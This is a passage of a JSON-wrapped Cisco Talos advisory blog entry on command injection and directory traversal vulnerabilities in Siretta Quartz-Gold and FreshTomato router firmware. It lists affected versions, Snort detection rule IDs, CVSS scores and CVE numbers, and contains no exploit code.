[TALOS-2022-1642](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1642>) (CVE-2022-38451). An attacker can send an HTTP request to trigger these vulnerabilities.\n\nCisco Talos worked with Siretta and FreshTomato to ensure that these issues were resolved and an update is available for affected customers, all in adherence to [Cisco&#x27;s vulnerability disclosure policy](<https://tools.cisco.com/security/center/resources/vendor_vulnerability_policy.html>).\n\nUsers are encouraged to update these affected products as soon as possible: Siretta QUARTZ-GOLD G5.0.1.5-210720-141020, FreshTomato 2022.5, Siretta QUARTZ-GOLD G5.0.1.5-210720-141020, AdvancedTomato commit 67273b0. Talos tested and confirmed these versions of Siretta and FreshTomato could be exploited by these vulnerabilities.\n\nThe following Snort rules will detect exploitation attempts against this vulnerability: 60649-60652, 60656-0664, 60667, 60692, 60721-60724, 60761-60763, 60771-60775, 60846-60847, 60914. Additional rules may be released in the future and current rules are subject to change, pending additional vulnerability information. For the most current rule information, please refer to your Firepower Management Center or Snort.org.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-01-26T21:26:14", "type": "talosblog", "title": "Vulnerability Spotlight: OS command injection, directory traversal and other vulnerabilities found in Siretta Quartz-Gold and FreshTomato", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2022-36279", "CVE-2022-38066", "CVE-2022-38088", "CVE-2022-38451", "CVE-2022-38459", "CVE-2022-38715", "CVE-2022-39045", "CVE-2022-40220", "CVE-2022-40222", "CVE-2022-40701", "CVE-2022-40969", "CVE-2022-40985", "CVE-2022-41030", "CVE-2022-41154", "CVE-2022-41991", "CVE-2022-42484", "CVE-2022-42490", "CVE-2022-42493"], "modified": "2023-01-26T21:26:14", "id": "TALOSBLOG:5A84CD5D3B3106E07A6CAFECDC1167F6", "href": "https://blog.talosintelligence.com/vulnerability-spotlight-os-command-injection-directory-traversal-and-other-vulnerabilities-found-in-siretta-quartz-gold-and-freshtomato/", "cvss": {"score": 0.0, "vector": "NONE"}}]}